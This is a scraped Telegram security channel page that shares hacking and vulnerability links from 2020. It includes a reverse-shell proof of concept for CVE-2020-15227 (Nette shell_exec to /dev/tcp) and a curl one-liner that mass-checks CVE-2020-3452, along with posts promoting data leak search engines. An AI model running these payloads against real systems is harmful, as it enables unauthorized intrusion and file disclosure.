HackerOne – Telegram

HackerOne

9.79K subscribers

633 photos

30 videos

76 files

2.69K links

Community : @Sec0x01
@Bug0x
Admin : @Offensive

Download Telegram

About

Blog

Apps

Platform

9.79K subscribers

Data Leak Search Engine

2.14K viewsAmir Kiani, 07:44

Data Leak Search Engine

List Archive

2.18K viewsAmir Kiani, 07:45

2.34K viewsAmir Kiani, 07:45

2.39K viewsAmir Kiani, 07:46

https://miaan.org/wp-content/uploads/2020/09/Spiraling-Attacks_Iranian-Hacking-Campaign.pdf

2.12K viewsAmir Kiani, 13:53

https://miaan.org/wp-content/uploads/2020/09/Spiraling-Attacks_Iranian-Hacking-Campaign.pdf

https://miaan.org/publication/spiraling-attacks/

2.21K viewsAmir Kiani, 13:55

Forwarded from Security Analysis

CVE-2020-15227 PHP framework nette callback RCE

POC: /nette.micro?callback=shell_exec&cmd=bash%20-i%20>&%20/dev/tcp/'+lhost+'/'+lport+'0>&1
@securation

2.07K viewsAdeL, 17:14

https://github.com/securitywithoutborders/hardentools

GitHub - hardentools/hardentools: Hardentools simply reduces the attack surface on Microsoft Windows computers by disabling low…

Hardentools simply reduces the attack surface on Microsoft Windows computers by disabling low-hanging fruit risky features. - hardentools/hardentools

2.3K viewsAmir Kiani, 08:22

https://github.com/securitywithoutborders/hardentools

2.64K viewsAmir Kiani, 08:22

One-line check for CVE-2020-3452 from a list

while read DOM; do curl -s -k "https://$DOM/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" | head | grep -q Cisco && echo [VULNERABLE] $DOM || echo [NOT VULNERABLE] $DOM; done < $1

2.78K viewsAmir Kiani, 08:59

Linux Bluetooth Zero-Click Remote Code Execution
https://ift.tt/3lPWuXd

2.72K viewsAdeL, 20:25

2.62K viewsAmir Kiani, 17:14

https://mksben.l0.cm/2020/10/discord-desktop-rce.html

Discord Desktop app RCE

A few months ago, I discovered a remote code execution issue in the Discord desktop application and I reported it via their Bug Bounty Prog...

3.37K viewsAmir Kiani, 10:44

https://youtu.be/iMNs8YAy6pk

Hacking Android Apps with Frida

Recording from Meta's security conference 2020 - Enjoy

2.6K viewsAmir Kiani, 14:56

https://blog.360totalsecurity.com/en/secret-stealing-trojan-active-in-brazil-releases-the-new-framework-solarsys/

360 Total Security Blog

Secret-stealing-Trojan-active-in-Brazil-releases-the-new-framework-SolarSys

360 Security Center has detected a variety of hacking Trojans through the fileless attack protection function，and Trojans spread through the new Trojan distribution framework. According to the framework's peculiar naming method, we named it SolarSys.

2.54K viewsAmir Kiani, 08:00

Vulnerability Spotlight: Code execution vulnerability in Google Chrome WebGL

https://ift.tt/35j5fTg

Cisco Talos Blog

Vulnerability Spotlight: Code execution vulnerabilities in LEADTOOLS

Marcin Towalski and Cory Duplantis of Cisco Talos discovered these vulnerabilities.

Cisco Talos recently discovered multiple vulnerabilities in the LEADTOOLS line of imaging toolkits. LEADTOOLS is a collection of toolkits designed to perform a variety of…

2.52K viewsAdeL, 15:45

Fuzzilli – JavaScript Engine Fuzzing Library

https://ift.tt/37vNgLS

Darknet - Hacking Tools, Hacker News & Cyber Security

Fuzzilli - JavaScript Engine Fuzzing Library

Fuzzilii is a JavaScript engine fuzzing library, it's a coverage-guided fuzzer for dynamic language interpreters based on a custom intermediate language.

2.6K viewsAdeL, 09:43

https://pentest.blog/what-is-llmnr-wpad-and-how-to-abuse-them-during-pentest/

2.77K viewsAmir Kiani, 11:35